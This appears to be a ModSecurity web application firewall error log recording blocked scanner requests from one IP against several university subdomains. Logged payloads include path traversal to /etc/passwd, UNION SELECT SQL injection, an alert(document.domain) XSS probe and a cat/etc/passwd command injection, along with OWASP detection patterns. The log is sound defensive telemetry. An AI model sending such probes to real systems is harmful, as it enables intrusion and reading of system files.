[Tue Aug 29 11:46:41.449462 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:name: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webapi/file/transfer"] [unique_id "ZO14McCo-f0AAAhrqTkAAAAo"]
[Tue Aug 29 11:46:42.372825 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14MsCo-f0AAAhrqToAAAAo"]
[Tue Aug 29 11:46:42.383772 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:name: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webapi/file/transfer"] [unique_id "ZO14MsCo-f0AAAjIhioAAAAJ"]
[Tue Aug 29 11:46:42.483077 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14MsCo-f0AAAjIhi0AAAAJ"]
[Tue Aug 29 11:46:43.531697 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/manage_user.php"] [unique_id "ZO14M8Co-f0AAAjKysMAAAAQ"]
[Tue Aug 29 11:46:43.601592 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/manage_user.php"] [unique_id "ZO14M8Co-f0AAAhzvm8AAAAx"]
[Tue Aug 29 11:46:43.629292 2023] [:error] [pid 2231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:name: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webapi/file/transfer"] [unique_id "ZO14M8Co-f0AAAi3Z0wAAAAP"]
[Tue Aug 29 11:46:43.629602 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/manage_user.php"] [unique_id "ZO14M8Co-f0AAAhZRrkAAAAG"]
[Tue Aug 29 11:46:43.651229 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/manage_user.php"] [unique_id "ZO14M8Co-f0AAAhZRroAAAAG"]
[Tue Aug 29 11:46:44.420526 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/manage_user.php"] [unique_id "ZO14NMCo-f0AAAjIhi8AAAAJ"]
[Tue Aug 29 11:46:45.459124 2023] [:error] [pid 2253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/manage_user.php"] [unique_id "ZO14NcCo-f0AAAjN0PsAAAAU"]
[Tue Aug 29 11:46:47.371638 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:refurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: }}}; found within ARGS:refurl: }}};alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/owa/auth/frowny.aspx"] [unique_id "ZO14N8Co-f0AAAhBSJYAAAAX"]
[Tue Aug 29 11:46:47.425557 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:refurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: }}}; found within ARGS:refurl: }}};alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/owa/auth/frowny.aspx"] [unique_id "ZO14N8Co-f0AAAh4DeQAAAA2"]
[Tue Aug 29 11:46:47.428905 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:refurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: }}}; found within ARGS:refurl: }}};alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/owa/auth/frowny.aspx"] [unique_id "ZO14N8Co-f0AAAhui6YAAAAr"]
[Tue Aug 29 11:46:47.448656 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:refurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: }}}; found within ARGS:refurl: }}};alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/owa/auth/frowny.aspx"] [unique_id "ZO14N8Co-f0AAAhzvn0AAAAx"]
[Tue Aug 29 11:46:47.461150 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:refurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: }}}; found within ARGS:refurl: }}};alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/owa/auth/frowny.aspx"] [unique_id "ZO14N8Co-f0AAAjKyskAAAAQ"]
[Tue Aug 29 11:46:47.551448 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:refurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: }}}; found within ARGS:refurl: }}};alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/owa/auth/frowny.aspx"] [unique_id "ZO14N8Co-f0AAAjKysoAAAAQ"]
[Tue Aug 29 11:46:49.655220 2023] [:error] [pid 2231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:id: -1 UNION SELECT 1,md5(999999999),3,4,5,6,7,8--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14OcCo-f0AAAi3Z1oAAAAP"]
[Tue Aug 29 11:46:49.668178 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:id: -1 UNION SELECT 1,md5(999999999),3,4,5,6,7,8--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14OcCo-f0AAAjW9AAAAAAA"]
[Tue Aug 29 11:46:49.677003 2023] [:error] [pid 2231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:id: -1 UNION SELECT 1,md5(999999999),3,4,5,6,7,8--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14OcCo-f0AAAi3Z1sAAAAP"]
[Tue Aug 29 11:46:49.725196 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:id: -1 UNION SELECT 1,md5(999999999),3,4,5,6,7,8--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14OcCo-f0AAAhT374AAAAD"]
[Tue Aug 29 11:46:50.440468 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:id: -1 UNION SELECT 1,md5(999999999),3,4,5,6,7,8--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14OsCo-f0AAAhBSJ4AAAAX"]
[Tue Aug 29 11:46:50.621629 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:id: -1 UNION SELECT 1,md5(999999999),3,4,5,6,7,8--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14OsCo-f0AAAjM7AwAAAAT"]
[Tue Aug 29 11:46:51.371888 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/sites/all/modules/avatar_uploader/lib/demo/view.php"] [unique_id "ZO14O8Co-f0AAAjCa-0AAAAB"]
[Tue Aug 29 11:46:52.367012 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/sites/all/modules/avatar_uploader/lib/demo/view.php"] [unique_id "ZO14PMCo-f0AAAcsLcQAAAAE"]
[Tue Aug 29 11:46:52.386176 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/sites/all/modules/avatar_uploader/lib/demo/view.php"] [unique_id "ZO14PMCo-f0AAAjH@xMAAAAI"]
[Tue Aug 29 11:46:52.388050 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/sites/all/modules/avatar_uploader/lib/demo/view.php"] [unique_id "ZO14PMCo-f0AAAjIhjwAAAAJ"]
[Tue Aug 29 11:46:52.389703 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/sites/all/modules/avatar_uploader/lib/demo/view.php"] [unique_id "ZO14PMCo-f0AAAcsLcUAAAAE"]
[Tue Aug 29 11:46:52.497021 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/sites/all/modules/avatar_uploader/lib/demo/view.php"] [unique_id "ZO14PMCo-f0AAAjIhkEAAAAJ"]
[Tue Aug 29 11:46:54.949477 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/execute_cmd.cgi"] [unique_id "ZO14PsCo-f0AAAjYrAQAAAAK"]
[Tue Aug 29 11:46:54.968199 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/execute_cmd.cgi"] [unique_id "ZO14PsCo-f0AAAjYrAUAAAAK"]
[Tue Aug 29 11:46:55.008895 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/execute_cmd.cgi"] [unique_id "ZO14P8Co-f0AAAjYrAcAAAAK"]
